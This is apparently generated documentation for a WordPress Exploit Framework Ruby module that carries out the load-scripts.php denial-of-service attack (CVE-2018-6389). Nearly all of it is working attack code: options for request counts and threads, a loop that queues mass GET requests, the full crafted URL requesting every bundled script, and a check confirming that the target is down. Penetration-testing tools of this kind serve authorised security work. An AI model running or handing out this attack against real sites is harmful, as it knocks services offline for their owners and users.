class Wpxf::Auxiliary::LoadScriptsDos

Attributes

complete_requests[RW]

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::Net::HttpClient::new
# File lib/wpxf/modules/auxiliary/dos/load_scripts_dos.rb, line 7
def initialize
  super

  update_info(
    name: 'WordPress "load-scripts.php" DoS',
    desc: %(
      All versions of WordPress, as of March, 2018, are vulnerable to a
      denial of service attack by making large amounts of requests to the
      load-scripts.php file. This module allows users to configure a maximum
      number of requests (via `max_requests`), and the number of threads to
      use (`max_http_concurrency`) and will execute the requests and then
      check the status of the website.
    ),
    author: [
      'Barak Tawily', # Vulnerability disclosure
      'rastating'     # WPXF module
    ],
    references: [
      ['CVE', '2018-6389'],
      ['WPVDB', '9021'],
      ['URL', 'https://baraktawily.blogspot.co.uk/2018/02/how-to-dos-29-of-world-wide-websites.html']
    ],
    date: 'Feb 05 2018'
  )

  register_options([
    IntegerOption.new(
      name: 'max_requests',
      required: true,
      desc: 'Max number of requests to send',
      default: 200
    ),
    IntegerOption.new(
      name: 'http_client_timeout',
      desc: 'Max wait time in seconds for HTTP responses',
      default: 5,
      required: true
    )
  ])
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/auxiliary/dos/load_scripts_dos.rb, line 52
def check
  wordpress_and_online? ? :vulnerable : :unknown
end
max_requests() click to toggle source
# File lib/wpxf/modules/auxiliary/dos/load_scripts_dos.rb, line 48
def max_requests
  normalized_option_value('max_requests')
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/dos/load_scripts_dos.rb, line 109
def run
  return false unless super

  emit_info "Preparing #{max_requests} requests..."
  setup_requests

  emit_info "Beginning execution of #{max_requests} requests over #{max_http_concurrency} threads"
  execute_queued_requests
  emit_success 'Finished executing requests'

  if wordpress_and_online?
    emit_error "FAILED: #{full_uri} appears to still be online"
    return false
  else
    emit_success "#{full_uri} appears to be down"
    return true
  end
end
setup_requests() click to toggle source
# File lib/wpxf/modules/auxiliary/dos/load_scripts_dos.rb, line 94
def setup_requests
  opts = {
    url: vulnerable_url,
    method: :get
  }

  self.complete_requests = 0
  max_requests.times do
    queue_request(opts) do |_res|
      self.complete_requests += 1
      emit_warning("#{complete_requests} requests executed") if (complete_requests % 10).zero?
    end
  end
end
vulnerable_url() click to toggle source
# File lib/wpxf/modules/auxiliary/dos/load_scripts_dos.rb, line 56
def vulnerable_url
  normalize_uri(
    full_uri,
    'wp-admin',
    'load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,'\
    'wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,'\
    'wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,'\
    'scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound'\
    ',scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,'\
    'jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,'\
    'jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,'\
    'jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate'\
    ',jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,'\
    'jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,'\
    'jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu'\
    ',jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,'\
    'jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,'\
    'jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color'\
    ',schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,'\
    'jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject'\
    ',moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers'\
    ',comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect'\
    ',mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement'\
    ',wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,'\
    'wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,'\
    'language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent'\
    ',customize-base,customize-loader,customize-preview,customize-models,customize-views,'\
    'customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets'\
    ',customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models'\
    ',wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox'\
    ',tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,'\
    'media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,'\
    'custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,'\
    'wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,'\
    'custom-header,custom-background,media-gallery,svg-painter&ver=4.9.1'
  )
end